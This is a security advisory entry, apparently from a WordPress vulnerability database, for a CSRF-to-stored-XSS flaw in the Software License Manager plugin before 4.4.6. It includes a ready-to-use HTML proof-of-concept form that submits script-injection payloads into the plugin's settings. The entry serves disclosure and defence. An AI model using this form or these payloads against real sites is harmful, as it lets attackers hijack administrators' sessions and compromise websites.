WordPress Plugin Vulnerabilities
Software License Manager < 4.4.6 - CSRF to Stored XSS
Description
The plugin did not have CSRF check on its settings page, nor sanitisation when outputting user input back. Attackers could make a logged in administrator change the plugin's settings, and put XSS payload in them.
Proof of Concept
<html> <body> <form action="https://example.com/wp-admin/admin.php?page=wp_lic_mgr_settings" method="POST"> <input type="hidden" name="lic_creation_secret" value='"><script>alert(/XSS-1/)</script>' /> <input type="hidden" name="lic_verification_secret" value='"><script>alert(/XSS-2/)</script>' /> <input type="hidden" name="lic_prefix" value='"><script>alert(/XSS-3/)</script>' /> <input type="hidden" name="default_max_domains" value='"><script>alert(/XSS-4/)</script>' /> <input type="hidden" name="slm_save_settings" value=" Update Options" /> <input type="submit" value="Submit request" /> </form> </body> </html>
Affects Plugins
References
Classification
Type
CSRF
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Koken Tokuda
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-04-23 (about 3 years ago)
Added
2021-04-23 (about 3 years ago)
Last Updated
2022-03-05 (about 2 years ago)